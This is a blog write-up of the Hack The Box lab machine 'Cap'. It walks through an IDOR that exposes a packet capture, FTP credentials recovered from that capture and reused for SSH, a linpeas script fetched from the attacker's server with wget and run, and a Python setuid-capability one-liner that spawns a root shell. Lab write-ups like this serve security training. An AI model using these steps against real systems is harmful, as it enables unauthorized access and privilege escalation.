Home Hack The Box Writeup - Cap
Post
Cancel

Hack The Box Writeup - Cap

Posted Aug 4, 2021 Updated Jun 3, 2022
Preview Image
By Korbinian Spielvogel
5 min read

Cap is an easy Linux box. By exploiting a IDOR in the web application, we got access to a PCAP file, which contained credentials for FTP. Re-using these credentials for the SSH login gave us initial access to the system. To obtain root privileges, we exploited some misconfigured capabilities.

As always, we first scan the target machine.

Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

rustscan --ulimit 5000 10.129.174.187 -- sV -sC -oN nmap_scan

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack
22/tcp open  ssh     syn-ack
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2vrva1a+HtV5SnbxxtZSs+D8/EXPL2wiqOUG2ngq9zaPlF6cuLX3P2QYvGfh5bcAIVjIqNUmmc1eSHVxtbmNEQjyJdjZOP4i2IfX/RZUA18dWTfEWlNaoVDGBsc8zunvFk3nkyaynnXmlH7n3BLb1nRNyxtouW+q7VzhA6YK3ziOD6tXT7MMnDU7CfG1PfMqdU297OVP35BODg1gZawthjxMi5i5R1g3nyODudFoWaHu9GZ3D/dSQbMAxsly98L1Wr6YJ6M6xfqDurgOAl9i6TZ4zx93c/h1MO+mKH7EobPR/ZWrFGLeVFZbB6jYEflCty8W8Dwr7HOdF1gULr+Mj+BcykLlzPoEhD7YqjRBm8SHdicPP1huq+/3tN7Q/IOf68NNJDdeq6QuGKh1CKqloT/+QZzZcJRubxULUg8YLGsYUHd1umySv4cHHEXRl7vcZJst78eBqnYUtN3MweQr4ga1kQP4YZK5qUQCTPPmrKMa9NPh1sjHSdS8IwiH12V0=
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDqG/RCH23t5Pr9sw6dCqvySMHEjxwCfMzBDypoNIMIa8iKYAe84s/X7vDbA9T/vtGDYzS+fw8I5MAGpX8deeKI=
|   256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPbLTiQl+6W0EOi8vS+sByUiZdBsuz0v/7zITtSuaTFH
80/tcp open  http    syn-ack
| http-methods: 
|_  Supported Methods: HEAD OPTIONS GET
|_http-title: Security Dashboard

The open ports are:

  • 21 - FTP: no further information
  • 22 - SSH: no further information
  • 80 - HTTP: Some kind of web application called “Security Dashboard”

Port 80

At first, we start with investigating the web application hosted on Port 80.

Apparently it’s some kind of network monitoring dashboard. We also see that we are automatically logged in as user Nathan (top-right corner). The dashboard also provides several functionalities (menu at the left). Let’s see what we can do here.

1) IP Config
Here we can see the ifconfig or ip addr command output of the machine (IPv4, IPv6 addresses). Nothing suspicious though. 1) Network Status
Here we can see the netstat command output of the machine. Again, nothing’s suspicious.

1) Security Snapshot (5 Second PCAP + Analysis)
Here we can see an analysis of recorded network packets (number of packets, number of IP packets, number of TCP packets and number of UDP packets). Furthermore, we are able to download the 5-sec PCAP file. However, no data has been recorded yet. Looking at the URL, we see that we are currently looking at data/1… if we re-visit the Security Snapshot functionality again, we get the data/2… Maybe there is also data/0? Indeed! And it even contains recorded packets. Let’s download it and analyze it with Wireshark.

Analysis of the PCAP file

Opening the downloaded pcap file in wireshark, reveals several TCP streams. Analyzing them by right-clicking one of the packets -> Follow -> TCP Stream provides us a better overview of the exchanged packets. In TCP Stream 3, we finally find a plaintext FTP login with the credentials nathan and Buck3tH4TF0RM3!.

Port 21

Let’s try those found credentials nathan:Buck3tH4TF0RM3! for the open FTP port. Maybe we will find more information there.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

└──╼ $ ftp 10.129.174.187                                  
Connected to 10.129.174.187.
220 (vsFTPd 3.0.3)
Name (10.129.174.187:ctf): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r--------    1 1001     1001           33 Aug 04 15:34 user.txt
226 Directory send OK.
ftp> get user.txt

And indeed! We find the user.txt file! Download it with the command get and open it locally to get the user-flag! However, now we are stuck as we have no further information on how to proceed from here. Therefore, my approach was to also try the FTP credentials for the SSH login.

Foothold - Port 22

Using the same credentials as before for the SSH login succeeds!

1
2
3
4

└──╼ $ ssh nathan@10.129.174.187 
nathan@cap:~$ hostname && id
cap
uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)

We now have full access to the user nathan on the target machine.

Privilege Escalation

First, we transfer the linPeas script onto the target machine to run a thorough scan of the system. We can do that by running following commands:

1
2
3
4
5
6
7
8

[ON THE ATTACKER MACHINE]
└──╼ $ sudo python2 -m SimpleHTTPServer 8888
Serving HTTP on 0.0.0.0 port 8888 ...

[ON THE TARGET MACHINE]
nathan@cap:/tmp$ wget 10.10.17.25:8888/linpeas.sh
nathan@cap:/tmp$ chmod +x linpeas.sh 
nathan@cap:/tmp$ ./linpeas.sh

One of the interesting findings was the following:

1
2

[+] Capabilities
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

Background Information: Capabilities

Before capabilities, we only had the binary system of privileged and non-privileged processes and for the purpose of performing permission checks, traditional UNIX implementations distinguish two categories of processes: privileged processes that referred as superuser or root and unprivileged processes (whose effective UID is nonzero). Capabilities are those permissions that divide the privileges of kernel user or kernel level programs into small pieces so that a process can be allowed sufficient power to perform specific privileged tasks.” (https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/)

Manually checking the capabilities gives us following information:

1
2
3
4
5
6

nathan@cap:/tmp$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

Breakdown of the capabilities for /usr/bin/python3.8:

  • cap_setuid: Allow changing of the UID
  • cap_net_bind_service+eip: Bind a socket to Internet domain privileged ports

This means that when running a python script, we are allowed to change the UID: “If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.” (https://gtfobins.github.io/gtfobins/python/#capabilities). This is great!

Thus, we simply set the UID to 0 (root) and then spawn a shell!

1

nathan@cap:/tmp$ python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

And we are root!

1
2
3

root@cap:/tmp# hostname & id
cap
uid=0(root) gid=1001(nathan) groups=1001(nathan)
htb, machines
wireshark pcap capabilities
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents